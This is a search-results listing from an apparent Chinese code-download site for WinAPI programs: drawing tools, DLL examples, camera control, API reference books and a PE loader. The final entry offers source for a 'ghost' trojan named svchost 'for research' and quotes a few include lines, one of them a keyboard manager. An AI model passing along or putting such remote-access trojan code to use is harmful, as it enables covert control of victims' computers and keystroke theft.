搜索资源列表
检查软驱
- 一个检查软驱中是否有软盘的VFP的函数,使用了WinAPI-a check whether there are floppy diskette the VFP functions, use the WinAPI
WinAPIPicture
- 使用WinAPI函数直接写的一个画图板的小程序,为了方便上传,我把它放在了word文档里-function directly using WinAPI write a small drawing board procedures, in order to facilitate upload, I put it in a word document Lane
dllTest5_stdcall
- 如果通过VC++编写的DLL欲被其他语言编写的程序调用,应将函数的调用方式声明为__stdcall方式,WINAPI都采用这种方式,而C/C++缺省的调用方式却为__cdecl。这个工程为你演示了__stdcall调用的例子。-prepared by the DLL in order to be prepared in other languages procedure call, shall function call statement of the way __stdcall, WINA
DelphiUseWinAPIControlMicroCamera
- delphi利用winAPI控制摄像头,可拍照取图,也可以摄像-delphi use winAPI control camera can take pictures from the map, the camera can also
AHMC3T2K
- All AHM Triton Tools 2000 for C++ Builder 3 V1.3 BetaAHM 2000 提供的控件超过 150 个,其中有不少是增强型的图形控件,也有的是对 WinAPI 函数的封装,当然,也有对数据库与网络的支持。-2000 Triton Tools for C Builder V1.3 BetaAHM 2000 three of control over 150, many of which are enhanced graphics controls,
WinAPI
- 作为Microsoft 32位平台的应用程序编程接口,Win32 API是从事Windows应用程序开发所必备的。本书首先对Win32 API函数做完整的概述;然后收录五大类函数:窗口管理、图形设备接口、系统服务、国际特性以及网络服务;在附录部分,讲解如何在Visual Basic和Delphi中对其调用。 本书是从事Windows应用程序开发的软件工程师的必备参考手册。-Microsoft 32-bit platforms as application programming i
WinAPI
- 全书收录了五大类函数:窗口管理、图形设备接口、系统服务、国际特性以及网络服务。所有函数均附有功能说明、参数说明、返回值说明、备注以及引用说明。另外,在本书的第一章,我们对WiN32 API函数作了完整的概述;在附录部分,讲解了如何在Visual Basic和Delphi中对其调用。 -The book includes five major functions: window management, graphics device interface, system services, in
X86_32_Bit209604122008
- 32 位 X86 汇编工具,支持编译成可执行文件-This is an experimental 32 Bit Assembler. Originally planned for me to learn assembly language it turned out way bigger then I thought. It supports most of the standard, FPU, MMX, SSE and 3DNow instructions, can write Windows
WinAPI-GetKeyNameText-
- 根据键盘消息获取按键名称 根据键盘消息获取按键名称-According to the name of the keyboard keys to get the message to get key messages under the name of the keyboard
D2009SmartFlash_v1.5_FS
- Flash播放器Delphi插件,可以制作多功能SWF播放器。-Delphi Flash Player plug-in, you can create multi-SWF Player.
MiniNotepad
- winAPI实现的记事本,体积很小,有保存读取功能-WinAPI notepad
winapi-rbsp
- 各行业都需要的人口数据查询接口,dephi编写的com组件,包涵4个文件。-Every industry needs of the population data query interface, prepared by the dephi COM component, containing 4 documents.
procinfo
- Обобщающие примеры работы с WinAPI. Пример №5 Получение списка процессов, запущенных в системе, их модулей, окон и свойств этих окон Григорьев Антон, 2005 Специально для Королевства Delphi http://www.delphikingdom.com
procinfo
- Обобщающие примеры работы с WinAPI. Пример №5 Получение списка процессов, запущенных в системе, их модулей, окон и свойств этих окон Григорьев Антон, 2005 Специально для Королевства Delphi http://www.delphikingdom.com
ShBrowseU
- ShBrowserForFolder winapi wrapper for Delphi.
C_Assembler.PE-loader
- PE-loader which I wrote in C and Assembler. Loads test dll and calls the needed function from there. Analogues of WinAPI GetProcAddress and LoadLibrary are implemented.
WinAPI
- WinAPI, is Microsoft s core set of application programming interfaces (APIs) available in the Microsoft Windows operating systems. The name Windows API collectively refers to a number of different platform implementations that are often referred to b
svchost
- ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl